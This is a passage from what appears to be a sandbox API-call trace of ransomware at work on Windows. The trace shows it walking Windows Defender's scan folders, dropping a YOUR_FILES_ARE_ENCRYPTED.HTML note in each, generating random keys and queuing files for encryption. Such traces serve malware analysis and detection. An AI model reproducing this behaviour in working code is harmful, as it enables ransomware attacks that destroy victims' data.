ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 1 [0107.729] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a50b7ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6520aed4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="0000000000000000.idx", cAlternateFileName="000000~1.IDX")) returned 1 [0107.729] StrStrIW (lpFirst="0000000000000000.idx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.729] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2\\0000000000000000.idx") returned 84 [0107.729] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0107.729] lstrlenW (lpString=".idx") returned 4 [0107.729] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0107.729] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0107.729] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2\\0000000000000000.idx" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\metastore\\2\\0000000000000000.idx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0107.729] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=80) returned 1 [0107.729] CloseHandle (hObject=0x310) returned 1 [0107.729] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a50b7ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6520aed4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="0000000000000000.idx", cAlternateFileName="000000~1.IDX")) returned 0 [0107.730] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0107.730] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0107.730] GetProcessHeap () returned 0x600000 [0107.730] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.730] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\metastore\\2\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.730] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.732] CloseHandle (hObject=0x32c) returned 1 [0107.733] GetProcessHeap () returned 0x600000 [0107.733] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.733] GetProcessHeap () returned 0x600000 [0107.733] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.734] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="3", cAlternateFileName="")) returned 1 [0107.734] StrStrIW (lpFirst="3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.734] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3") returned 63 [0107.734] GetProcessHeap () returned 0x600000 [0107.734] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.735] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3" [0107.735] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3\\*" [0107.735] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0107.735] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 1 [0107.735] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a50b7ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6520aed4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="0000000000000000.idx", cAlternateFileName="000000~1.IDX")) returned 1 [0107.735] StrStrIW (lpFirst="0000000000000000.idx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.736] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3\\0000000000000000.idx") returned 84 [0107.736] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0107.736] lstrlenW (lpString=".idx") returned 4 [0107.736] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0107.736] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0107.736] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3\\0000000000000000.idx" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\metastore\\3\\0000000000000000.idx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0107.736] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=80) returned 1 [0107.736] CloseHandle (hObject=0x310) returned 1 [0107.736] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a50b7ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6520aed4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="0000000000000000.idx", cAlternateFileName="000000~1.IDX")) returned 0 [0107.736] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0107.736] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0107.736] GetProcessHeap () returned 0x600000 [0107.736] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.737] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\metastore\\3\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.737] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.738] CloseHandle (hObject=0x32c) returned 1 [0107.739] GetProcessHeap () returned 0x600000 [0107.739] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.739] GetProcessHeap () returned 0x600000 [0107.739] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.740] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="4", cAlternateFileName="")) returned 1 [0107.740] StrStrIW (lpFirst="4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.740] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4") returned 63 [0107.740] GetProcessHeap () returned 0x600000 [0107.740] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.741] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4" [0107.741] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4\\*" [0107.741] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName=".", cAlternateFileName="")) returned 0x626878 [0107.741] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 1 [0107.742] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a50b7ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6520aed4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="0000000000000000.idx", cAlternateFileName="000000~1.IDX")) returned 1 [0107.742] StrStrIW (lpFirst="0000000000000000.idx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.742] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4\\0000000000000000.idx") returned 84 [0107.742] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0107.742] lstrlenW (lpString=".idx") returned 4 [0107.742] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0107.742] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0107.742] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4\\0000000000000000.idx" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\metastore\\4\\0000000000000000.idx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0107.743] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=80) returned 1 [0107.743] CloseHandle (hObject=0x310) returned 1 [0107.743] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a50b7ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6520aed4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="0000000000000000.idx", cAlternateFileName="000000~1.IDX")) returned 0 [0107.743] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0107.743] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0107.743] GetProcessHeap () returned 0x600000 [0107.743] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.743] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\metastore\\4\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.747] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.747] CloseHandle (hObject=0x32c) returned 1 [0107.748] GetProcessHeap () returned 0x600000 [0107.748] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.748] GetProcessHeap () returned 0x600000 [0107.748] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.750] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="4", cAlternateFileName="")) returned 0 [0107.750] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0107.750] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0107.751] GetProcessHeap () returned 0x600000 [0107.751] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.751] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MetaStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\metastore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0107.753] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.754] CloseHandle (hObject=0x314) returned 1 [0107.755] GetProcessHeap () returned 0x600000 [0107.755] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.755] GetProcessHeap () returned 0x600000 [0107.755] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0107.755] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0xa2b1a6, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin", cAlternateFileName="MPCACH~1.BIN")) returned 1 [0107.755] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.755] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin") returned 104 [0107.755] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin") returned=".bin" [0107.755] lstrlenW (lpString=".bin") returned 4 [0107.755] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin") returned=".bin" [0107.756] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.756] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\mpcache-9899dbe4d8bb3d253eb4f285757bebaf1581b50f.bin"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0107.756] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=10662310) returned 1 [0107.756] GetProcessHeap () returned 0x600000 [0107.756] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0107.760] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="3F") returned 2 [0107.760] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="22") returned 2 [0107.760] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="C4") returned 2 [0107.760] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="7B") returned 2 [0107.760] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="D5") returned 2 [0107.760] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="87") returned 2 [0107.760] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="BD") returned 2 [0107.760] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="A8") returned 2 [0107.760] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="30") returned 2 [0107.760] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="88") returned 2 [0107.760] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="18") returned 2 [0107.760] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="36") returned 2 [0107.760] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="DA") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="E4") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="75") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="18") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="E8") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="AE") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="9E") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="78") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="DC") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="24") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="68") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="6F") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="66") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="32") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="C1") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="DA") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="F1") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="8E") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="25") returned 2 [0107.761] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="78") returned 2 [0107.762] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin" [0107.762] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.762] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0107.762] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf907e70d, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf907e70d, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf90caa0a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x18ea5e4, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.5B", cAlternateFileName="MPCACH~1.5B")) returned 1 [0107.762] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.5B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.762] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.5B") returned 107 [0107.762] PathFindExtensionW 